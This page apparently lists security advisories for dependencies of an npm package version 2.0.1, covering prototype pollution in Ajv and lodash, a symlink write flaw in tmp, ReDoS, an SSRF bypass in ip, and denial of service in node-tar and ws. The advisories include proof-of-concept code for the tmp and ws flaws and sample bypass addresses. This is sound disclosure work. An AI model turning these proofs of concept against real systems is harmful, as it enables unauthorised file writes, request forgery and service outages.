All the vulnerabilities related to the version 2.0.1 of the package
Prototype Pollution in Ajv
An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. (While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)
tmp allows arbitrary temporary file / directory write via symbolic link dir parameter
tmp@0.2.3 is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir parameter points to a symlink that resolves to a folder outside the tmpDir, it's possible to bypass the _assertIsRelative check used in _assertAndSanitizeOptions:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.
tmpDir that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1 (outside the tmpDir):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink
Regular Expression Denial of Service (ReDoS) in cross-spawn
Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution.
The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith' which allow a malicious user to modify the prototype of Object via __proto__ causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}} causing the addition or modification of an existing property that will exist on all objects.
Update to version 4.17.12 or later.
Denial of service while parsing a tar file due to lack of folders count validation
During some analysis today on npm's node-tar package I came across the folder creation process, Basicly if you provide node-tar with a path like this ./a/b/c/foo.txt it would create every folder and sub-folder here a, b and c until it reaches the last folder to create foo.txt, In-this case I noticed that there's no validation at all on the amount of folders being created, that said we're actually able to CPU and memory consume the system running node-tar and even crash the nodejs client within few seconds of running it using a path with too many sub-folders inside
You can reproduce this issue by downloading the tar file I provided in the resources and using node-tar to extract it, you should get the same behavior as the video
Here's a video show-casing the exploit:
Denial of service by crashing the nodejs client when attempting to parse a tar archive, make it run out of heap memory and consuming server CPU and memory resources
This report was originally reported to GitHub bug bounty program, they asked me to report it to you a month ago
ip SSRF improper categorization in isPublic
The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.
NPM IP package incorrectly identifies some private IP addresses as public
The isPublic() function in the NPM package ip doesn't correctly identify certain private IP addresses in uncommon formats such as 0x7F.1 as private. Instead, it reports them as public by returning true. This can lead to security issues such as Server-Side Request Forgery (SSRF) if isPublic() is used to protect sensitive code paths when passed user input. Versions 1.1.9 and 2.0.1 fix the issue.
http-cache-semantics vulnerable to Regular Expression Denial of Service
http-cache semantics contains an Inefficient Regular Expression Complexity , leading to Denial of Service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.
Use-After-Free in puppeteer
Versions of puppeteer prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.
Upgrade to version 1.13.0 or later.
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.